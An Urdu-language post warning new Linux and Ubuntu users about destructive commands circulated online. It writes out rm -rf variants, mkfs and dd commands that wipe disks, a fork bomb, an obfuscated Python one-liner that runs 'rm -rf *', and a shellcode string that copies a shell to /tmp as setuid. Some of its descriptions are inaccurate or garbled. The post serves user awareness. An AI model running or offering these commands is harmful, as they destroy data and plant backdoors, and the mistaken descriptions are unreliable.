لینکس کی تقسیمیں آپریٹنگ سسٹم کی دنیا میں مشہور ہوتی جا رہی ہیں۔ اور یہی وجہ ہے کہ اب یہ ایسے لوگوں کی نظر میں کھٹکنے لگی ہے جن کو کمپیوٹر کی دنیا میںکبھی امن پسند نہیں رہا۔ گزشتہ دنوں چند ایسی کمانڈز کو انٹرنیٹ پر دیا گیا جو کہ آپ کے لینکس اور خاص طور پر یوبنٹو سسٹم کے لئے خطرناک اور اگر اچھے الفاظ میں کہوں تو جان لیوا ثابت ہوتی ہیں۔ ان کمانڈز کے ذریعے نئے نئے لینکس استعمال کرنے والے لوگوں کو بہت نقصان ہوا۔ اور یہی وجہ ہے کہ میں یہ تمام کمانڈز یہاں پر لکھ رہا ہوں ان کو یاد نہیں تو کم از کم دیکھ ضرور لیں تا کہ کہیں انٹرنیٹ پر لینکس کے بارے میں کوئی ٹوٹوریل پڑہتے ہوئے آپ بھی غلط چیز کا شکار نہ ہو جائیں۔ تو یہ رہیں کمانڈز اور ان کی تفصیل۔
Code:
sudo rm -rf /
یہ کمانڈ آپ کے سسٹم کی تمام فائلز اڑانے کی صلاحیت رکھتی ہے
۔
Code:
sudo rm -rf .
یہ کمانڈ آپ جس ڈائریکٹری میں موجود ہوں گے اسے ڈیلیڈ کر دیتی ہے۔
Code:
sudo rm -rf *
اس کمانڈ کے ذریعے موجودہ فولڈر سے تمام فائلز ڈیلیٹ*ہو جاتی ہیں
۔
Code:
rm -rf * or rm -rf *.*
یہ کمانڈ بھی اوپر والی کمانڈ کا کام کرتی ہے لیکن اس کو استعمال کرنے کے لئے سوڈو یعنی ایڈمنسٹریٹر ہونے کی بھی ضرورت نہیں ہوتی۔
Code:
rm -rf ~/ &
یہ آپ کی ہوم ڈائریکٹری اڑا دے گی اس کمانڈ کیلئے بھی ایڈمنسٹریٹر ہونا ضروری نہیں۔
Code:
sudo mkfs
sudo mkfs.ext3
sudo mkfs.bfs
sudo mkfs.ext2
sudo mkfs.minix
sudo mkfs.msdos
sudo mkfs.reiserfs
sudo mkfs.vfat
اوپر دی گئی تمام کمانڈز کے ذریعے آپ کی ہارڈ ڈرائیو آرام سے فارمیٹ ہو سکتی ہے۔ ان سب کمانڈز کیلئے آپ کا ایڈمنسٹریٹر یعنی روٹ ہونا لازمی ہو گا۔
Code:
sudo mkfs.cramfs
اوپر دی گئی کمانڈ آپ کی ہارڈ ڈسک آرام سے فارمیٹ کر دے گی چاہے آپ روٹ ہوںیا نہیں۔
Code:
sudo dd if=/dev/zero of=/dev/hda
sudo dd if=/dev/hda of=/dev/hdb
sudo dd if=something of=/dev/hda
یہ کمانڈز پوری ہارڈ ڈسک کو صفر کر سکتی ہیں۔ یہ کمانڈ تھوڑی سی تبدیل بھی ہو سکتی ہے۔
Code:
){:|:&};:
fork while fork
یہ دونوںکمانڈز اتنے پروسیس چلاتی ہیں کہ آپ کا سسٹم بالکل رک جاتا ہے اور مجبورا آپ کو بند کر کے چلانا پڑتا ہے
Code:
char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "xebx3ex5bx31xc0x50x54x5ax83xecx64x68"
"xffxffxffxffx68xdfxd0xdfxd9x68x8dx99"
"xdfx81x68x8dx92xdfxd2x54x5exf7x16xf7"
"x56x04xf7x56x08xf7x56x0cx83xc4x74x56"
"x8dx73x08x56x53x54x59xb0x0bxcdx80x31"
"xc0x40xebxf9xe8xbdxffxffxffx2fx62x69"
"x6ex2fx73x68x00x2dx63x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";
یہ والا اسکرپٹ گزشتہ دنوں ای میلز اور فورمز پر آیا تھا اور اس میںیہ بتایا گیا تھا کہ اگر آپ اسے استعمال کریں گے تو آپ کو بنا پاس ورڈ کے ایڈمنسٹریٹر والی سہولیتا مل جائیں گی۔ لیکن ایسا کچھ نہیں ہوتا بلکہ یہ آپ کی ہوم ڈائریکٹری اڑا دیتا ہے۔
Code:
python -c 'import os; os.system("".join([chr(ord(i)-1) for i in "sn!.sg!+"]))'
یہ پائتھن پروگرامنگ زبان کی چھوٹی سی چیز استعمال کر کے آپ کے سسٹم پر وہ کمانڈ چلا دیتا ہے جو موجودہ فولڈر سے تمام چیزیں اڑا دیتی ہے۔ اس طرح کی دوسری کمانڈز سے بھی ہوشیار رہیں۔
Bookmarks